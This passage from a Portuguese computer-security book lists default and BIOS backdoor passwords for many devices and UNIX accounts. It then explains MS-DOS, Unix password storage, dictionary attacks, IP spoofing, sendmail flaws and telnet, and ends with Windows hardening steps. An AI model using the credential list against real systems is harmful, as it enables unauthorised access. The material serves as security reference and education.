Research
PC BIOS Console
n/a Col2ogro2
Admin
RM RM Connect Multi
admin rmnetlm
RM RM Connect Multi
admin2 changeme
RM RM Connect Multi
adminstrator
changeme
RM RM Connect Multi
deskalt password
RM RM Connect Multi
deskman changeme
RM RM Connect Multi
desknorm
password
RM RM Connect Multi
deskres password
RM RM Connect Multi
guest (none)
RM RM Connect Multi
replicator
replicator
RM RM Connect Multi
RMUser1
password
RM RM Connect Multi
setup changeme
RM RM Connect Multi
teacher password
RM RM Connect Multi
temp1 password
RM RM Connect Multi
topicalt password
RM RM Connect Multi
topicnorm
password
RM RM Connect Multi
topicres password
RM Server BIOS Console
n/a RM
Semaphore
PICK O/S DESQUETOP
Semaphore
PICK O/S DS
Semaphore
PICK O/S DSA
Semaphore
PICK O/S PHANTOM
Shuttle PC BIOS n/a Spacve Admin
Siemens Hicom 100E PBX 31994 31994
Siemens Hicom 150E PBX 31994 31994
Siemens PhoneMail poll poll
Siemens PhoneMail poll tech
Siemens PhoneMail sysadmin
sysadmin
Siemens PhoneMail system system
Terrorismo Tecnológico Aprenda Para Sobreviver
331
Siemens PhoneMail system field
Siemens PhoneMail tech tech
Siemens ROLM PBX admin pwp
Siemens ROLM PBX eng engineer
Siemens ROLM PBX op op
Siemens ROLM PBX op operator
Siemens ROLM PBX su super
Siemens Nixdorf
PC BIOS Console
n/a SKY_FOX
Admin
Silicon Graphics
IRIX Multi
4Dgifts 4Dgifts Admin
Silicon Graphics
IRIX Multi
4Dgifts (none) Admin
Silicon Graphics
IRIX Multi
demos (none) Admin
Silicon Graphics
IRIX Multi
Ezsetup (none) Admin
Silicon Graphics
IRIX Multi
field field Admin
Silicon Graphics
IRIX 5.x, 6.x Multi
guest (none) CLI, UID guest
Silicon Graphics
IRIX 5.x, 6.x Multi
lp (none) CLI, UID lp
Silicon Graphics
IRIX Multi
OutOfBox
(none) Admin
Silicon Graphics
IRIX Multi
tour tour Admin
Silicon Graphics
IRIX Multi
tutor (none) Admin
Silicon Graphics
IRIX Multi
tutor tutor Admin
Sovereign Hill
InQuery Admin shs Admin
Sun Sun E10000 System Service Processor
Multi ssp ssp Admin
Sun SunScreen 3.1 Lite
TCP 3852
admin admin Admin
SuperMicro
PC BIOS Console
n/a ksdjfg934t
Admin
Sybase Adaptive Server Enterprise
11.x,12.x
Multi sa (none) SA and SSO
Terrorismo Tecnológico Aprenda Para Sobreviver
332
roles
Telus Telephony Services Multi (created) telus00 User
Telus Telephony Services Multi (created) telus99 User
Tiny PC BIOS Console
n/a Tiny Admin
TMC PC BIOS Console
n/a BIGO Admin
Toshiba PC BIOS Console
n/a 24Banc81
Admin
Toshiba PC BIOS Console
n/a Toshiba Admin
Toshiba PC BIOS Console
n/a toshy99 Admin
UNIX Generic Multi adm adm Admin
UNIX Generic Multi adm (none) Admin
UNIX Generic Multi admin admin User
UNIX Generic Multi administrator
administrator
User
UNIX Generic Multi administrator
(none) User
UNIX Generic Multi anon anon User
UNIX Generic Multi bbs bbs User
UNIX Generic Multi bbs (none) User
UNIX Generic Multi bin sys Admin
UNIX Generic Multi bin sys Admin
UNIX Generic Multi checkfs checkfs User
UNIX Generic Multi checkfsys
checkfsys
User
UNIX Generic Multi checksys
checksys
User
UNIX Generic Multi daemon daemon User
UNIX Generic Multi daemon (none) User
UNIX Generic Multi demo demo User
UNIX Generic Multi demo (none) User
UNIX Generic Multi demos demos User
UNIX Generic Multi demos (none) User
UNIX Generic Multi dni (none) User
UNIX Generic Multi dni dni User
UNIX Generic Multi fal (none) User
UNIX Generic Multi fal fal User
UNIX Generic Multi fax (none) User
UNIX Generic Multi fax fax User
UNIX Generic Multi ftp (none) User
UNIX Generic Multi ftp ftp User
UNIX Generic Multi games games User
Terrorismo Tecnológico Aprenda Para Sobreviver
333
UNIX Generic Multi games (none) User
UNIX Generic Multi gopher gopher User
UNIX Generic Multi gropher (none) User
UNIX Generic Multi guest guest User
UNIX Generic Multi guest guestgue
User
UNIX Generic Multi guest (none) User
UNIX Generic Multi halt halt User
UNIX Generic Multi halt (none) User
UNIX Generic Multi informix informix User
UNIX Generic Multi install install Admin
UNIX Generic Multi lp lp User
UNIX Generic Multi lp bin User
UNIX Generic Multi lp lineprin User
UNIX Generic Multi lp (none) User
UNIX Generic Multi lpadm lpadm User
UNIX Generic Multi lpadmin lpadmin User
UNIX Generic Multi lynx lynx User
UNIX Generic Multi lynx (none) User
UNIX Generic Multi mail (none) User
UNIX Generic Multi mail mail User
UNIX Generic Multi man man User
UNIX Generic Multi man (none) User
UNIX Generic Multi me (none) User
UNIX Generic Multi me me User
UNIX Generic Multi mountfs mountfs Admin
UNIX Generic Multi mountfsys
mountfsys
Admin
UNIX Generic Multi mountsys
mountsys
Admin
UNIX Generic Multi news news User
UNIX Generic Multi news (none) User
UNIX Generic Multi nobody (none) User
UNIX Generic Multi nobody nobody User
UNIX Generic Multi nuucp (none) User
UNIX Generic Multi operator operator User
UNIX Generic Multi operator (none) User
UNIX Generic Multi oracle (none) User
UNIX Generic Multi postmaster
postmast
User
UNIX Generic Multi postmaster
(none) User
Terrorismo Tecnológico Aprenda Para Sobreviver
334
UNIX Generic Multi powerdown
powerdown
User
UNIX Generic Multi rje rje User
UNIX Generic Multi root root Admin
UNIX Generic Multi root (none) Admin
UNIX Generic Multi setup setup Admin
UNIX Generic Multi shutdown
shutdown
User
UNIX Generic Multi shutdown
(none) User
UNIX Generic Multi sync sync User
UNIX Generic Multi sync (none) User
UNIX Generic Multi sys sys Admin
UNIX Generic Multi sys system Admin
UNIX Generic Multi sys bin Admin
UNIX Generic Multi sysadm sysadm Admin
UNIX Generic Multi sysadm admin Admin
UNIX Generic Multi sysadmin
sysadmin
Admin
UNIX Generic Multi sysbin sysbin Admin
UNIX Generic Multi system_admin
(none) Admin
UNIX Generic Multi system_admin
system_admin
Admin
UNIX Generic Multi trouble trouble User
UNIX Generic Multi umountfs
umountfs
User
UNIX Generic Multi umountfsys
umountfsys
User
UNIX Generic Multi umountsys
umountsys
User
UNIX Generic Multi unix unix User
UNIX Generic Multi user user User
UNIX Generic Multi uucp uucp User
UNIX Generic Multi uucpadm
uucpadm
User
UNIX Generic Multi web (none) User
UNIX Generic Multi web web User
UNIX Generic Multi webmaster
webmaster
User
UNIX Generic Multi webmaster
(none) User
UNIX Generic Multi www (none) User
UNIX Generic Multi www www User
Unknown
System 88 Console
test test User
Unknown
System 88 Console
operator operator Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
335
Unknown
System 88 Console
overseer overseer Admin
Unknown
POCSAG Radio Paging
2.05 Port 8000
n/a password
Admin
Verifone Verifone Junior 2.05 (none) 166816
Vextrec Technology
PC BIOS Console
n/a Vextrex
Vobis PC BIOS Console
n/a merlin Admin
Wim Bervoets
WIMBIOSnbsp BIOS
Console
n/a Compleri Admin
WWWBoard
WWWADMIN.PL HTTP
WebAdmin
WebBoard
Admin
Xylan Omniswitch Telnet
admin switch Admin
Xylan Omniswitch Telnet
diag switch
Xyplex Routers Port 7000
n/a access User
Xyplex Routers Port 7000
n/a system Admin
Xyplex Terminal Server Port 7000
n/a access User
Xyplex Terminal Server Port 7000
n/a system Admin
Zenith PC BIOS Console
n/a 3098z Admin
Zenith PC BIOS Console
n/a Zenith Admin
ZEOS PC BIOS Console
n/a zeosx Admin
Zyxel Generic Routers Telnet
n/a 1234 Admin
17.4 Política de senhas não-crackeáveis
Como já descrito antes combine maiúscula com minúsculas e números no meio!
Terrorismo Tecnológico Aprenda Para Sobreviver
337
18.1 MS-DOS
Por ser um dos primeiros S.O. e muito usado até hoje já que é base para outros Sistemas Operacionais, é muito valido saber um pouco de como ele funciona.
Ao ligarmos um computador o ROM-BIOS (Read Only Basic Input/Output System) começa uma bateria de testes de inicialização (POST - Power-On Self-Test) que testa todas as características funcionais do computador (RAM, teclado, vídeo, drives, etc.).
Após os testes terem sido bem sucedidos e se não forem encontrados erros ele entrega o sistema agora para o S.O. (Sistema Operacional). Geralmente ele procura primeiro no drive de disquete e caso não encontre irá procurar no disco rígido!
Encontrado ele é carregado na memória
No caso do MS-DOS assim que estiver carregado na memória ele mostrará o prompt de comando, que quer dizer que ele já está preparado e esperando a solicitação de alguma função. O prompt indica que o sistema esta esperando a linha de comando para executar a função solicitada.
18.2 Características do MS-DOS
O MS-DOS é monousuário e monoprogramado. A comunicação do usuário com o MS-DOS ocorre de dois modos, o modo interativo e o modo batch.
a) Modo Interativo: Propriedade de executar um comando no instante em que foi digitado através do prompt, que é um sinal que indica que o MS-DOS está pronto para executar seus comandos.
Terrorismo Tecnológico Aprenda Para Sobreviver
338
b) Modo batch: Também chamado de comandos em lote, ou seja, uma seqüência de comandos que serão executados na ordem em que aparecem. Os comandos desejados devem ser colocados em ordem seqüencial em um arquivo que pode ser criado por um processador de textos.
18.3 Comandos Internos
São comandos que por serem usadas com maior freqüências, são inerentes ao Sistema Operacional, sendo carregados na memória toda vez que o MS-DOS é carregado. Portanto, podem ser executados a qualquer momento e em qualquer subdiretório.
Principais Comandos Internos:
� DIR: Usado para exibir os arquivos e os subdiretórios de um diretório. Se usado sem parâmetros e opções, este exibirá o nome de volume, o número de série do disco, os diretórios, os arquivos e suas respectivas extensões, seus tamanhos, a data e a hora de criação ou alteração, o total de arquivos exibidos, seus tamanhos acumulados e o total de espaço livre em disco em bytes. Sintaxe: DIR [DRIVE:/CAMINHO][/ATRIBUTOS]
� COPY: Comando utilizado para copiar arquivos de um local para outro, utilizado para concatenar vários arquivos gerando apenas um. Sintaxe: COPY [driveorigem:][nomearq.ext] [drivedestino:]
� DEL: Remove um ou mais arquivos especificados de um diretório. A especificação pode ser de um arquivo em particular ou de um grupo de arquivos, utilizando-se os caracteres globais [*][?]. Sintaxe: DEL [drive:][nomearq.ext]
� MKDIR ou MD: Comando utilizado para criar um diretório ou para criar uma estrutura hierárquica de níveis múltiplos. Sintaxe: MD [unidade][caminho] nome diretório
Terrorismo Tecnológico Aprenda Para Sobreviver
339
� CHDIR ou CD: Comando utilizado para alterar o diretório corrente. Sintaxe: CD [caminho]
� RMDIR ou RD: Comando utilizado para remover, excluir, deletar um diretório.
Sintaxe: RD[unidade][caminho]nome diretório
18.4 Comandos Externos
São comandos usados com menor freqüência e que por isso tem que ser carregados na memória RAM toda vez que for necessária sua utilização.
Alguns Comandos Externos:
� FORMAT: Formatador de discos do MS-DOS, ou seja, estabelece marcos eletrônicos que determinam a divisão do disco em trilhas, setores e capacidade de bytes, de forma que este possa ser reconhecido pelo sistema operacional e então receber e transmitir informações.
Sintaxe: FORMAT [drive:] � DISKCOPY: Comando utilizado para fazer uma cópia idêntica
do conteúdo de um disco para outro. Sintaxe: DISKCOPY [origem][destino]
� BACKUP: Comando que permite que se realize cópias de
segurança e restaurações de um disco, diretório ou arquivo para outro disco ou diretório.
Sintaxe: MSBACKUP [arquivo de configuração] � LABEL: Comando para criar, modificar ou apagar o volume
(nome) de um disco. O volume de um disco pode ter até 11 caracteres ou nenhum.
Sintaxe: LABEL [drive:][nome do disco]
Terrorismo Tecnológico Aprenda Para Sobreviver
340
� TREE: Comando que permite visualizar o caminho dos diretórios de um disco de forma hierárquica.
Sintaxe: TREE [drive:]
18.5 Comandos de Inicialização
� CLS: Comando utilizado para limpar a tela. Sintaxe: A:\>CLS ou C:\>CLS
� TIME: Comando utilizado para verificar a hora do sistema e configurar a nova hora do mesmo. Suas informações são utilizadas para alterar o diretório sempre que criamos ou alteramos um arquivo. Sintaxe: TIME hh:mm:ss:cs a/p (am/pm)
� DATE: Comando utilizado para exibir a data do sistema e configurar a mesma.
Sintaxe: DATE mm-dd-aa � VER: Comando utilizado para exibir a versão do MS-DOS. Sintaxe: VER � TYPE: Utilizado para se exibir o conteúdo de um arquivo tipo
texto. Sintaxe: TYPE [unidade][caminho] nome arquivo
18.6 Arquivos em Lote
O S.O. permite que agrupemos uma série de comandos dentro de um arquivo de forma a serem executadas seqüencialmente todas vezes que este arquivo for chamado no Prompt. Este processo é chamado de Processamento em Lote, ou arquivo Autoexecutável ou
Terrorismo Tecnológico Aprenda Para Sobreviver
341
Batch File. Estes arquivos podem ser criados diretamente no Prompt do sistema operacional ou num editor de arquivos texto, como o EDIT. Os arquivos em lote têm em comum entre si, a sintaxe de comandos e a extensão.BAT no seu nome-de-arquivo. Pode-se criar arquivos .BAT para diversas aplicações, tais como:
- exibição de diretórios; - mudança de PATH; - cópias de segurança; - compressão de arquivos; - parametrização do sistema, etc.
O arquivo .BAT mais presente nos computadores de modo geral é o AUTOEXEC.BAT, que normalmente é utilizado para estabelecer parâmetros de utilização do sistema e do equipamento, visto que é executada, toda vez que o sistema é inicializado.
18.7 Outros
� DEFRAG: Desfragmentador de arquivos do MS-DOS.
� MSAVE: Programa antivírus que acompanha o MSDOS. O menu principal deste utilitário apresenta as seguintes opções:
a) Encontrar - Pesquisa o disco por vírus conhecidos. b) Encontrar e limpar - Pesquisa disco e remove virus conhecidos. c) Selecionar nova unidade - Seleciona unidade a ser pesquisada. d) Opções - Definem opções de pesquisa como verificar integridade (alteração no tamanho de arquivos executáveis), criar totais de controle, anti-stealth e verificar todos os arquivos.
� VSAFE: Programa residente em memória que faz uma checagem verificando atividades suspeitas que poderiam estar
Terrorismo Tecnológico Aprenda Para Sobreviver
342
sendo feitas por algum tipo de vírus. Os controles feitos pelo vsafe são:
a) Avisar quando uma formatação de baixo nível está acontecendo. b) Avisar quando algum programa residente esta sendo carregado. c) Verificar arquivos executáveis abertos pelo DOS. d) Verificar setor de boot dos discos procurando por vírus. e) Evitar que arquivos executáveis sejam regravados. f) Proteger a área de boot contra gravação.
Terrorismo Tecnológico Aprenda Para Sobreviver
344
19.1 Autenticação Fraca
O Unix guarda as informações de todos os usuários do sistema
no arquivo /etc/passwd. Este arquivo contém o username, o nome real, informação para a identificação e informações básicas sobre a conta de cada usuário no sistema. O arquivo é organizado da seguinte forma: cada linha do arquivo contém o registro de um usuário, e os registros são divididos em campos separados pelo caracter (:).
Por exemplo:
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/csh
daemon:*:1:1::/tmp: uucp:OORoMN9FyZfNE:4:4::/usr/spool/uucppublic:/usr/lib/uucp/u
ucico jsilva:eH5/.mj7NB3dx:181:100:José Silva:/u/jsilva:/bin/csh
As três primeiras contas, root, daemon e uucp, são contas do sistema e a última é conta de usuário.
Os campos de cada linha tem o seguinte significado:
jsilva username eH5/.mj7NB3dx senha do usuário cifrada 181 número identificador do usuário (UID) 100 número identificador do grupo ao qual
usuário pertence (GID)
Terrorismo Tecnológico Aprenda Para Sobreviver
345
José Silva nome real do usuário /u/jsilva/ diretório home do usuário /bin/csh shell do usuário
O objetivo da senha é de autenticar o usuário. Em muitas versões do Unix caso um usuário tente acessar um sistema e entre com a senha errada diversas vezes consecutivamente, a conta deste usuário é bloqueada. Isto evita com que uma pessoa fique tentando acertar a senha de outro, e, caso isto aconteça, deve-se avisar ao administrador que alguém está tentando quebrar uma conta.
A senha é cifrada com uma função one-way a qual cifra a senha com blocos de zero. O resultado da função crypt( ) é armazenado no arquivo /etc/passwd. Quando tentamos entrar no sistema o programa /bin/login cifra a senha digitada pelo usuário com a mesma função, e compara o resultado com o que temos armazenado no arquivo /etc/passwd, se forem iguais permite a entrada do usuário no sistema.
O algoritmo do crypt( ) usado é baseado no DES (Data Encryption Standard).
O ataque mais usado na rede é chamado de Ataque do Dicionário que foi criado por Robert Morris (coincidência ou não, filho de Robert Morris da NSA que foi um dos pesquisadores que desenvolveu crypt( ) ). O ataque consiste na cifragem das palavras de um dicionário através da função crypt( ), e comparações com os arquivos de senhas de usuários. Desta forma, quando uma palavra do dicionário cifrada coincidisse com a senha cifrada de um usuário, o atacante teria obtido uma senha.
Para dificultar este ataque foi criado o chamado salt, que é um número randômico gerado na hora em que o usuário esta inserindo ou alterando a sua senha. O número gerado pode estar entre 0 e 4095 e é cifrado juntamente com a senha, o que impede a utilização de um dicionário genérico para todos os usuários. O atacante agora
Terrorismo Tecnológico Aprenda Para Sobreviver
346
tem que cifrar cada palavra do dicionário com o salt de cada usuário.
Embora cada usuário tenha seu username, o Unix internamente representa cada usuário por um número, o UID (User Identifier). Os UIDs são números de 16 bits e geralmente os UIDs entre 0 e 9 são usados para funções do sistema. Os UIDs para os usuários começam geralmente em 20 ou 100.
O Unix guarda a relação entre username e UID no arquivo /etc/passwd, após a senha cifrada temos o UID do usuário.
O UID [GAR94] é o identificador real do usuário para o sistema operacional, o username é utilizado apenas por ser mais conveniente para os usuários. Se dois usuários possuírem o mesmo UID, o Unix os veria como um mesmo usuário, mesmo eles tendo username e senhas diferentes.
Todo o usuário do Unix pertence a um ou mais grupos, e estes grupos, como os identificadores de usuário, também possuem identificador de grupo, o GID (Group Identifier). O administrador do sistema cria os grupos e especifica quais arquivos, diretórios ou dispositivos os usuários deste grupo vão ter acesso. No /etc/passwd é armazenado o GID do grupo primário do usuário. Os dados do grupo são armazenados no arquivo /etc/group.
19.2 IP Spoofing
O IP spoofing consiste na troca do IP original por um outro,
podendo assim se passar por um outro host.
Através de IP Spoofing um intruso pode se aproveitar de hosts confiáveis armazenados no arquivo.rhosts, e entrar em máquinas via rlogin, por exemplo, onde não é exigido senha.
Terrorismo Tecnológico Aprenda Para Sobreviver
347
O famoso ataque de Kevin Mitnick à rede particular de Tsutomo Shimomura, um especialista em segurança de sistemas, em dezembro de 1994, foi baseado no ataque descrito acima. Mitnick, além da rede de Shimomura, através de um modem e celular, invadiu diversos outros sistemas, como universidades, empresas e órgãos públicos.
Existe também o chamado Host Name Spoofing, mais fácil de implementar que o IP Spoofing, que é quando um DNS retorna um nome falso para um dado IP. Pode ser utilizado para atacar alguns sistemas que possuem serviços baseados em autenticação pelo nome do host.
19.3 FTP (File Transfer Protocol)
O serviço FTP permite que usuários transfiram arquivos
facilmente de um sistema para outro, através da rede.
O FTP apresenta o mesmo problema de segurança do telnet, trafegar username e senha pela rede sem nenhuma proteção.
O FTP pode ser configurado para trabalhar também com acesso anônimo, ou seja, qualquer pessoa, mesmo que não tenha conta naquela máquina pode depositar e copiar arquivos dela. O FTP anônimo é muito utilizado para a distribuição de documentos e softwares através da rede. Deve ser tomado muito cuidado na configuração de um servidor de FTP anônimo para que o acesso seja restrito aos arquivos determinados incluindo restrições de acesso. Outra atenção é que o servidor de FTP não fique sendo depósito de documentos indesejados como arquivos de intrusos, etc, por este motivo é aconselhável criar um diretório separado para a colocação de arquivos com espaço limitado.
Através do arquivo /etc/ftpusers eu posso impedir que os usuários especificados utilizem o serviço FTP.
Terrorismo Tecnológico Aprenda Para Sobreviver
348
19.4 MAIL
Através do protocolo SMTP (Simple Mail Transfer Protocol)
qualquer usuário envia uma mensagem de uma máquina para outra através da rede. O mail é o serviço mais difundida da Internet.
O sendmail, uma das implementações mais difundidas do SMTP, atua tanto como servidor como cliente.
O sendmail já é conhecido como fonte de problemas de segurança. Uma das vulnerabilidades do sendmail [GAL96] envolve em fazer o servidor executar o corpo de uma mensagem como uma shell script. O script pode fazer qualquer coisa que um usuário comum do sistema possa fazer, incluindo enviar o arquivo de senhas do sistema para o atacante. O sendmail praticamente não possui validação dos dados e permite também que seja enviado um mail par um arquivo.
O sendmail possui algumas contas que devem ser desabilitadas pelo administrador do sistema como, por exemplo, as contas “wizard”, “kill”, “debug”. A configuração do sendmail fica no arquivo /usr/lib/sendmail.cf.
O verme da Internet de 1988 utilizou-se do modo de depuração do sendmail para obter acesso irrestrito ao sistema invadido. O sendmail possui este modo de depuração, o que faz com que depois de instalado o sendmail deve ser recompilado com o modo de depuração desligado.
Como visto, o sendmail é o serviço mais fraco em nível de segurança e um dos mais utilizados.
Terrorismo Tecnológico Aprenda Para Sobreviver
349
19.5 Enteda mais sobre o kerberus
O Kerberos é uma implementação de um KDC, desenvolvida no MIT (Massachusetts Institute of Technology) utilizando o conceito de algoritmo de chave pública.
O Kerberos é um protocolo de autenticação projetado para Unix e redes TCP/IP. Um serviço Kerberos situado na rede atua com um árbitro. Kerberos provê autenticação segura na rede permitindo com que uma pessoa acesse diferentes máquinas na rede. O Kerberos é baseado em criptografia de chave única (foi implementado com o DES, mas outros algoritmos também podem ser usados).
No modelo Kerberos temos duas entidades na rede: o cliente e o servidor. Os clientes podem ser usuários ou software independente que precisam fazer download em arquivos, enviar mensagens, acessar bancos de dados, etc.
O Kerberos mantém uma base de dados com as chaves de seus clientes. No caso dos clientes serem usuários as chaves secretas pode ser uma senha cifrada. Serviços de rede que requerem autenticação, bem como os clientes que usem estes serviços registram suas chaves secretas com o Kerberos.
Sabendo a chave secreta de todos, o Kerberos pode criar mensagens que convençam uma entidade da identidade de outra.
Como o Kerberos trabalha:
Um cliente requisita um ticket para um Ticket-Granting Service (ticket TGS) para o serviço Kerberos. Este ticket é enviado para o cliente cifrado com a chave secreta deste cliente. Para usar um serviço particular, o cliente requisita um ticket para aquele serviço para o Ticket-Granting Server (TGS). Assumindo que tudo está em ordem, o TGS envia o ticket de volta ao cliente. O cliente apresenta o ticket para o servidor como um autenticador. Novamente, se não
Terrorismo Tecnológico Aprenda Para Sobreviver
350
há nada errado com as credenciais do cliente, o servidor deixa o cliente ter acesso ao serviço.
19.6 Criptografia UNIX
O algoritmo mais conhecido de chave única é o DES e o de chave pública e privada é o RSA.
19.7 Protocolos interessates
19.7.1 PGP
O PGP (Pretty Good Privacy), destina-se a comunicação segura via e-mail, para isto utiliza-se de criptografia de chave pública.
A mensagem enviada é criptografada com a chave pública do destinatário. Para que o usuário possa decifrar a mensagem ele decifra com a sua chave secreta a qual somente ele possui. Desta forma, qualquer pessoa que intercepte esta comunicação não conseguirá decifrar a mensagem.
No PGP temos também a facilidade de poder assinar uma mensagem, assim a mensagem vai cifrada com a chave secreta do remetente e o destinatário decifra com a chave pública do remetente. Uma mensagem pode ir cifrada e assinada.
19.7.2 SSL
Terrorismo Tecnológico Aprenda Para Sobreviver
351
O SSL (Secure Socket Layer) foi desenvolvido pela Netscape Communications com o objetivo de gerar segurança e privacidade entre duas aplicações. Com o SSL é possível que aplicações cliente/servidor se comuniquem de forma segura evitando influências externas, falsificação dos dados e “escuta” dos dados em claro.
O protocolo SSL atua entre o nível de aplicação e transporte da arquitetura Internet. Possui duas camadas: “SSL Record Protocol”, que é responsável por encapsular outros protocolos de alto nível e a “SSL Handshake Protocol”, que recebe os dados a serem cifrados/decifrados.
Esta segunda camada é responsável pela autenticação do cliente e/ou servidor, negociação do algoritmo criptográfico e suas chaves antes da aplicação receber ou enviar qualquer byte de dados.
Este protocolo é utilizado pelo BradescoNet para permitir homebanking.
19.8 Ferramentas para Verificação de Segurança no Unix
19.8.1 SATAN
Satan (Security Analysis Tool for Auditing Network) é o mais complexo sistema de auditoria para sistemas Unix disponível. Ele coleta a maior quantidade possível de informações sobre um host, examina os serviços de rede como o finger, o NFS, o NIS, o ftp e o tftp, rexd entre outros.
As informações que são relatadas pelo SATAN incluem tanto os tipos de serviços disponibilizados pelo host, quantos furos potenciais
Terrorismo Tecnológico Aprenda Para Sobreviver
352
nestes serviços. Estes furos geralmente são causados por erros de configuração ou bugs conhecidos dos diversos daemons. Além disto, ele pode não apenas analisar diversos hosts individualmente, mas também procurar furos baseados em Trusted Hosts, e este sim ter problemas de segurança [DAN96]. O SATAN pode também ser utilizado para verificar a topologia de uma rede, serviços oferecidos, tipos de hardware e software, etc.
19.8.2 TIGER
Muito parecido com o SATAN, o TIGER, é um conjunto de Bourne Shell (bash) scripts, programas em C e arquivos de dados que visam fazer uma auditoria de segurança num sistema Unix.
Sua maior diferença em relação ao SATAN está no fato de que a ênfase do TIGER esta em erros de permissões de arquivos, e não na área de serviços de rede, que é o caso do SATAN.
Basicamente, quando é executado, TIGER procura por um arquivo de configuração (geralmente.tigerrc) que irá limitar ou ampliar a quantidade de testes executados dependendo do desejo do usuário. Ele então irá executar uma série de scripts e retornará as falhas de segurança encontradas.
O TIGER sempre tenta descobrir formas que a conta root pode ser comprometida.
Terrorismo Tecnológico Aprenda Para Sobreviver
353
19.9 Telnet & Unix TELNET (Protocolo de Terminal Virtual) é um protocolo Internet
para estabelecer a conexão entre computadores e através dessa conexão remota pode-se executar qualquer comando ou até um programa em outra máquina, isto funciona tudo remotamente como se o teclado de seu computador estivesse ligado na CPU da outra máquina.
A interface para trabalhar é primitiva como a do dos sendo que a operação do computador remoto se dá da mesma forma, ou seja, através de uma linha de comandos UNIX.
Este programinha (telnet) já esta instalado na sua máquina, acontece que ele já vem instalado no Sistema Operacional.
O Telnet pode ser usado para a pesquisa de informações e transferência de arquivos desde que o computador ao qual você está conectado permitir que você faça essas funções.
Na verdade o Telnet foi desenvolvido para que operadores de sistemas (Sysop's) pudessem fazer algum tipo de manutenção em algum sistema, como em uma empresa ou servidor, assim que aparece algum erro ou problema o administrador remotamente através do telnet pode corrigir estes erros e colocar o Sistema para funcionar.
Programas para Telnet:
Para fazer uma conexão via Telnet, é necessário um programa específico. O windows 95 já vem com um, procure no diretório c:\windows o programa telnet.exe.
Conectando-se via Telnet Os passos que apresentamos aqui são
para o programa que acompanha a partir do Windows 95, mas são idênticos ou mudam mínimas coisas para os posteriores.
Terrorismo Tecnológico Aprenda Para Sobreviver
354
Inicie o programa Telnet.exe. Clique no menu "Conecta" (connect), selecione"Sistema Remoto" (remote system) e digite na caixa "Nome do Host" (Host Name) o endereço ao qual você quer se conectar.
Nas caixas "Porta" (port) e "Tipo do Terminal" (terminal type) selecione "telnet" e "vt100", respectivamente (isso não é um padrão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isto, clique no botão "Conectar" (Connect). Isto iniciará a conexão com o computadorremoto.
Ao se completar a conexão, o sistema remoto pedirá uma senha. A qual ou você deverá saber ou descobrir.
Agora isto abrirá as portas do computador remoto. Na tela surge uma série de opções, precedidas de um número ou letra.
Para executar um desses comandos, digite esse número ou letra e tecle enter agora é só explorar e ao terminar a conexão, volte ao menu "Conecta" e selecione "Desconectar".
Endereços para conexão:
netfind.if.usp.br - Busca mundial de usuários na Internet.
Digite netfind ao estabelecer a conexão.
ned.ipac.caltech.edu - Banco de dados Extragalático da NASA/IPAC.
Digite ned ao estabelecer a conexão..
spacelink.msfc.nasa.gov - Banco de dados da NASA. Digite guest ao estabelecer a conexão.
stis.nsf.gov : Informações científicas e tecnológicas. Digite public ao estabelecer a conexão.
Terrorismo Tecnológico Aprenda Para Sobreviver
355
Comandos básicos de Unix
Os servidores não permitem acesso público via Telnet, porque essa é a principal porta de entrada de qualquer invasor.
Para impedir não se encontram menus que facilitam a navegação pelo site ou operações de qualquer tipo, o que leva a necessidade de se conhecer os comandos para poder navegar.
Como os:
ls -l lista os arquivos de um diretório
ls -al lista todos os arquivos de um diretório, mesmo os Hidden
cp x y copia o arquivo do diretório x para o diretório y (o caminho de
diretório deve ser colocado por inteiro)
mv x y move o arquivo do diretório x para o diretório y (o caminho de
diretório deve ser colocado por inteiro)
rm x deleta o arquivo x
cd xxx muda o diretório ativo para xxx
cd .. muda o diretório ativo para o que está 'acima' do atual
mkdir xxx cria o diretório xxx dentro do diretório atual
rm xxx remove o diretório xxx
Terrorismo Tecnológico Aprenda Para Sobreviver
356
Capítulo XX Sistemas - Com este guia passo a passo, vamos melhorar os principais sistemas que são instalados em servidores e desktops,
Terrorismo Tecnológico Aprenda Para Sobreviver
357
Vamos melhorar nossos sistemas! Siga as seguintes etapas conforme o sistema instalado em seus servidores ou desktops.
20.1 Desktops com Windows XP
1. Familiarize-se com este guia sobre como obter segurança e
manter-se seguro e estas práticas recomendadas para
segurança da empresa
(http://www.microsoft.com/technet/security/bestprac/bpentsec.
asp)
2. Compreenda os novos recursos de segurança do Windows
XP Professional
(http://microsoft.com/technet/prodtechnol/winxppro/evaluate/x
psec.asp)
3. Mantenha seu sistema atualizado automaticamente com a
atualização automática do Windows ativada por padrão no
Windows XP ou, como alternativa, verifique com freqüência o
serviço do Windows Update
o Para administradores de sistema, o Catálogo do
Windows Update
(http://v4.windowsupdate.microsoft.com/en/default.asp)
permite selecionar as atualizações que precisam de
download e obter uma versão que pode ser distribuída
pela empresa.
Terrorismo Tecnológico Aprenda Para Sobreviver
358
4. Consulte as seções Security
(http://microsoft.com/technet/prodtechnol/winxppro/reskit/prpt_
pt3_ptnz.asp) e Networking
(http://microsoft.com/technet/prodtechnol/winxppro/reskit/prpt_
pt4_rrqd.asp) do Windows XP Resource Kit para configurar
seu firewall e o compartilhamento
(http://www.microsoft.com/TechNet/prodtechnol/winxppro/prod
docs/Share_conn_overvw.asp) da conexão com a Internet.
5. Mantenha-se em dia com os hotfixes de segurança mais
recentes usando Security Bulletins Search
6. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp).
20.2 Desktops com Windows 2000
1. Familiarize-se com este guia sobre como obter segurança e
manter-se seguro
(http://microsoft.com/security/articles/steps_default.asp) e
estas práticas recomendadas para segurança da empresa
(http://www.microsoft.com/technet/security/bestprac/bpentsec.
asp)
2. Verifique com freqüência o serviço Windows Update
(http://windowsupdate.microsoft.com/). Como alternativa para
Terrorismo Tecnológico Aprenda Para Sobreviver
359
administradores de sistema, o Catálogo do Windows Update
(http://v4.windowsupdate.microsoft.com/en/default.asp)
permite selecionar as atualizações que precisam de download
e obter uma versão que pode ser distribuída pela empresa.
3. Instale o Windows 2000 Security Rollup Package 1
(http://www.microsoft.com/technet/security/news/w2ksrp1.asp)
4. Use o conjunto de ferramentas de configuração do sistema da
Microsoft
(http://www.microsoft.com/technet/prodtechnol/windows2000s
erv/deploy/confeat/securcon.asp), para configurar a
segurança do sistema e realizar análises periódicas.
5. Mantenha-se em dia com os hotfixes de segurança mais
recentes usando Security Bulletins Search
